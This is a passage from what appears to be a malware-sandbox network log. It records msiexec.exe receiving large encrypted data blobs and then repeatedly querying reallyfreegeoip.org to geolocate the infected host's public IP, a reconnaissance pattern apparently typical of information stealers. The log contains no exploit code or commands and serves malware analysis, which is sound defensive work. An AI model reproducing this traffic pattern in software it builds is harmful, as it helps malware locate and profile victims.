  Data Raw: a4 44 13 eb 7b cb 14 f6 d4 c3 8c e1 34 96 48 3f d3 1d 7d 24 fc e7 76 f7 7c 1f 48 aa ca 22 67 d1 20 31 19 5a 65 79 a2 db d2 45 c1 37 12 5b 84 8b 8d d5 ec 21 31 89 9d ba a2 7c f2 5a f8 c1 a7 a6 53 08 ec fd 01 63 b6 39 bc dd b7 7c 4e c8 32 f3 de 5b 12 04 16 b0 42 05 a7 bc e8 92 fe 86 c5 bf be 09 33 dd bf 07 95 16 5f ba 4f d0 79 d3 87 3f f5 f8 81 ea 19 55 e2 81 5c af 23 7e a7 a4 73 37 0e d1 57 18 71 d3 3f 1f 47 b9 f5 40 1e be 67 ca 24 5c 71 a8 09 a0 6f b8 d3 bd 7e 90 5b 0d e9 60 0f 0c 8e 91 31 3e 02 60 68 50 a3 dc 53 23 02 c9 e8 ad 93 6d 5b 65 8c c3 b5 c5 7b a7 db 49 86 3e 8e 3f 5e 34 8b 25 05 ef 15 31 bb 48 e8 c2 f6 72 03 03 4b fb 0b 72 83 41 14 dd da e0 ab 11 bd 47 d5 2a 59 12 57 ae a7 7e 0f 29 6e d9 a4 cd fb 62 9e 2c 62 0d 9a 58 5c 06 9e 81 80 82 7c 4e bd
  Data Ascii: D{4H?}$v|H"g 1ZeyE7[!1|ZSc9|N2[B3_Oy?U\#~s7Wq?G@g$\qo~[`1>`hPS#m[e{I>?^4%1HrKrAG*YW~)nb,bX\|N

2024-10-22 14:11:59 UTC  1378 bytes  IN
  Data Raw: 5c 32 e0 32 b3 6c a3 96 8e a1 b9 16 c9 2c 70 66 ea b4 d3 72 85 ed 05 33 c1 cc f3 5e d9 ad 59 3b 98 80 12 80 8f 26 69 79 25 e1 0c 39 16 16 2b 64 af 16 f7 9a 09 8a c1 eb 3d a4 7d b2 3a f9 d4 96 44 78 5a 41 92 66 ac b2 60 c8 f5 14 60 6a d9 de c3 99 89 6a 3e 48 4f cf 35 ed 3f 93 36 60 09 77 0c 4e 83 0f 1b 57 d0 20 31 0f 66 ed 7f 9f d1 d2 63 b2 fb 12 5b a6 d4 4c d5 e6 2b 2d 77 1f ba a2 77 c4 4b 9b 7b d2 9c 23 20 a9 8e c2 65 14 16 c4 67 f2 7c 44 cc 81 d1 a9 ec ce 15 1c be 57 45 a7 b8 81 f6 db 9f b1 f9 af 0e 45 f5 8a 1d 97 36 f9 ba 3f 78 2e 68 8c b2 c5 d0 da eb 3c 49 ff cc 4c af 59 dc 93 b4 46 0e 4e d1 5d bb 71 dd 3f b1 44 b9 f5 40 1e b0 67 ca 24 5c 71 a8 09 a2 6f a2 ce bd 7e 90 56 61 97 58 05 ae a2 46 14 24 7a 48 75 22 19 6b 76 48 02 f6 e8 ad 93 e7 37 79 fe f1
  Data Ascii: \22l,pfr3^Y;&iy%9+d=}:DxZAf``jj>HO5?6`wNW 1fc[L+-wwK{# eg|DWEE6?x.h<ILYFN]q?D@g$\qo~VaXF$zHu"kvH7y

2024-10-22 14:11:59 UTC  1378 bytes  IN
  Data Raw: 5d 7f 2d 1f 54 18 ff ce f9 55 6d 79 d0 62 e2 a5 9d 77 da 30 9d b4 32 ba 94 d6 43 54 94 06 92 78 83 f7 0d d1 08 ed 7e e7 40 c7 bb b4 9c e8 79 50 70 37 7c 9e bc 12 00 84 d7 24 2f b1 22 b2 69 6e f0 c5 43 b7 9e ed a9 79 25 c2 86 ba 03 03 34 ab b3 cb b6 ca 2c 09 e8 c8 a4 c2 4b 85 ed 0b 91 38 08 92 40 f2 99 29 99 ba e6 16 80 ad 57 4a 6f 07 4a 6f 3f 1c 16 0b 64 a3 68 c5 b2 7e 8e b3 b6 3f a4 73 9b 12 78 d0 87 6c 1c ce 57 81 13 c3 a8 59 02 f3 3c 29 14 f6 d4 d2 be 85 1b 3c 48 3b f1 23 6c 3f 95 3c a8 e7 53 37 7c 92 09 28 74 f5 20 19 6d 72 13 73 7c d1 d2 65 c1 45 25 5b ac f8 ff 82 e4 21 5d 12 f5 3b a2 7d dd 5a 74 7d bf 83 32 05 81 a1 1c e8 54 1c ab a2 d7 6a 3c e0 86 d6 b6 8b eb 02 3e 74 6a 45 ad 1e cb 28 a9 e1 b4 f9 ce ab 12 66 e4 25 e7 1e 49 18 1a 68 2e f3 9f b2 c5
  Data Ascii: ]-TUmybw02CTx~@yPp7|$/"inCy%4,K8@)WJoJo?dh~?sxlWY<)<H;#l?<S7|(t mrs|eE%[!];}Zt}2Tj<>tjE(f%Ih.


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.6  49992        188.114.97.3    443               4460  C:\Windows\SysWOW64\msiexec.exe

Timestamp  Bytes transferred  Direction  Data

2024-10-22 14:12:04 UTC  87 bytes  OUT
  GET /xml/173.254.250.76 HTTP/1.1
  Host: reallyfreegeoip.org
  Connection: Keep-Alive

2024-10-22 14:12:04 UTC  895 bytes  IN
  HTTP/1.1 200 OK
  Date: Tue, 22 Oct 2024 14:12:04 GMT
  Content-Type: application/xml
  Transfer-Encoding: chunked
  Connection: close
  access-control-allow-origin: *
  vary: Accept-Encoding
  Cache-Control: max-age=86400
  CF-Cache-Status: HIT
  Age: 31680
  Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X2GJF%2BNOvrBe5IL7%2F4VAJDw6aOyquP7yB8Ff55gYV76WdVnoj7GINEhjJ1vKSFJiLlZQMrj5r67FlVr9GKvSARzQw5sXrsnztc%2BI89aEXU3trZJ1rIVFePdX0I5dIv%2FO4S29sG1Z"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8d6a14872ba3465f-DFW
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=989&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2806201&cwnd=247&unsent_bytes=0&cid=44a4f90c91f50a49&ts=162&x=0"

2024-10-22 14:12:04 UTC  366 bytes  IN
  Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
  Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                                          2024-10-22 14:12:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49993 | 188.114.97.3 | 443 | 4460 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-22 14:12:05 UTC | 63 | OUT | GET /xml/173.254.250.76 HTTP/1.1
Host: reallyfreegeoip.org
2024-10-22 14:12:05 UTC | 908 | IN | HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:12:05 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 31681
Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=14rub%2FvgsZNu7q1l7Dn3OUXr1o6U%2FrQU8qmxrKxQ8%2BujUlpqPgJjl9D%2Fg91FNrymQV%2FQFJl%2FhCf%2BQqTe3GwRG9zMYnJKcSnmcKtb4C7TgAVQ%2FqO%2F6xDCs%2FQ96bKa3yZfZ7HCUM7U"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d6a148d88d86b9a-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1274&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2220858&cwnd=226&unsent_bytes=0&cid=9cfb64ec4d1406c1&ts=154&x=0"
2024-10-22 14:12:05 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 14:12:05 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49994 | 188.114.97.3 | 443 | 3212 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-22 14:12:05 UTC | 87 | OUT | GET /xml/173.254.250.76 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-10-22 14:12:05 UTC | 894 | IN | HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:12:05 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 31681
Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TySsJ7rSEMJwL5X8sZZrxErADDYwQUv4jhFfy04h7MXwXBsdp4uGnU0f3sIOo5a%2FkatSq7P4MRem%2FpZZrcyRNNs5lZWczNNFAtZx8wHGBBpegYhvB92JXzz%2FDnwZfe0wAvObU97j"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d6a148ed9426b61-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1289&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2118507&cwnd=251&unsent_bytes=0&cid=192de139eb74c059&ts=173&x=0"
2024-10-22 14:12:05 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 14:12:05 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49996 | 188.114.97.3 | 443 | 3212 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-22 14:12:06 UTC | 63 | OUT | GET /xml/173.254.250.76 HTTP/1.1
Host: reallyfreegeoip.org
2024-10-22 14:12:06 UTC | 894 | IN | HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:12:06 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 31682
Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tz5SowAvXuWRVCRi8r2iKBGNDVwoa3JUXFnbQgIm1j6rtGcDg2nn84DH%2Fd0toAIN2Wq0kTjdDT9iXUcRwc7%2F9w581WmAFW8FVSHcuu%2BTSIvT2gWOxDEzChO2KVExFrUpEwV3R53m"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d6a14960d7f2caa-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1448&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1450901&cwnd=251&unsent_bytes=0&cid=9b7f62fdd6adbb58&ts=154&x=0"
2024-10-22 14:12:06 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 14:12:06 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49997 | 188.114.97.3 | 443 | 4460 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-22 14:12:07 UTC | 87 | OUT | GET /xml/173.254.250.76 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-10-22 14:12:07 UTC | 892 | IN | HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:12:07 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 31683
Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I9zuzq2elAO0Q%2BFjG94jG5uS0bHlKXxqH1nX87XWTidAQ4wmcdDRvBMIF8lgUk5CR19DR5tlcT5lRACndbV6TgHCEg5UHywauSwvdMg4SVDcAfV6YpS5y0Ls5FpUSekO5%2BWn7ipo"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d6a149868dbe742-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2240&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1385645&cwnd=245&unsent_bytes=0&cid=9a096c1be6c26561&ts=160&x=0"
2024-10-22 14:12:07 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 14:12:07 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 50000 | 188.114.97.3 | 443 | 3212 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-22 14:12:08 UTC | 87 | OUT | GET /xml/173.254.250.76 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-10-22 14:12:08 UTC | 900 | IN | HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:12:08 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 31684
Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0LeY90wv5PG2zWCmcD8xXJUAeyipfSkruj%2F%2FX%2FjKUOcdnfuevMnTXEAST1pS%2FAP7WAnjKwKo1LH8vMjR3BRPfP2pwwrFC8Sl5BhL7yeZLMJWiTg6sWG91YDB1KvU%2Fc%2B0bLvubZio"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d6a14a0291e6b2c-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1080&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2560565&cwnd=251&unsent_bytes=0&cid=b4b3cf7e99c729e3&ts=160&x=0"
2024-10-22 14:12:08 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 14:12:08 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 10 | Source IP: 192.168.2.6 | Source Port: 50001 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 4460 | Process: C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-22 14:12:08 UTC | 87 bytes | OUT
GET /xml/173.254.250.76 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-10-22 14:12:08 UTC | 896 bytes | IN
HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:12:08 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 31684
Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KYbAk3rkrhC9zVdWo34o%2B9Uz24wnUvx8OOP1cJBTePt7lZxykBm7u4AeVrQX%2BHCJQVPU8%2FJB2KFcIBMqV9bA43GKgEgBVGgOK3NjFLMGMkNJAH%2BPRc6tijqJMoTafMwdOwuB2C9L"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d6a14a30ed3c86f-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1380&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2029432&cwnd=252&unsent_bytes=0&cid=021c85d77c637da0&ts=218&x=0"
2024-10-22 14:12:08 UTC | 366 bytes | IN
Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 14:12:08 UTC | 5 bytes | IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 11 | Source IP: 192.168.2.6 | Source Port: 50004 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 3212 | Process: C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-22 14:12:09 UTC | 87 bytes | OUT
GET /xml/173.254.250.76 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-10-22 14:12:10 UTC | 898 bytes | IN
HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:12:10 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 31686
Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4%2FkzDuZyZ%2F84ezCoV8UG7mgxqyW5SxYeG3Z8FtD5M9%2BV51sQaz%2F2dlfIX95CQNOBTTRparEIpW267bg6thHcDPQg2Y5jZTl6Dcv88tuNEXPG9JrKiBS55cAxroCK%2FaePz7rXnA0r"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d6a14aacad34773-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1833&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1490478&cwnd=245&unsent_bytes=0&cid=f00fe05d0293e5a5&ts=153&x=0"
2024-10-22 14:12:10 UTC | 366 bytes | IN
Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 14:12:10 UTC | 5 bytes | IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 12 | Source IP: 192.168.2.6 | Source Port: 50005 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 4460 | Process: C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-22 14:12:10 UTC | 87 bytes | OUT
GET /xml/173.254.250.76 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-10-22 14:12:10 UTC | 893 bytes | IN
HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:12:10 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 31686
Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x9pt9JppU49CRJ5axL%2FuhAZPEvGnHxwnL5GVNvUO%2F2f0EDqGbS1JX6aMbLgST%2FkzWjqMeacT3inXlQwJSoxvcRk2h1ol5KpGM1HqtIvKdUIQz6QerseUHsX1JPjeF4ImuJ6jOC5l"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d6a14ad7da4c871-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1561&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1794299&cwnd=97&unsent_bytes=0&cid=4eaddd1d97a0cd97&ts=155&x=0"
2024-10-22 14:12:10 UTC | 366 bytes | IN
Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 14:12:10 UTC | 5 bytes | IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


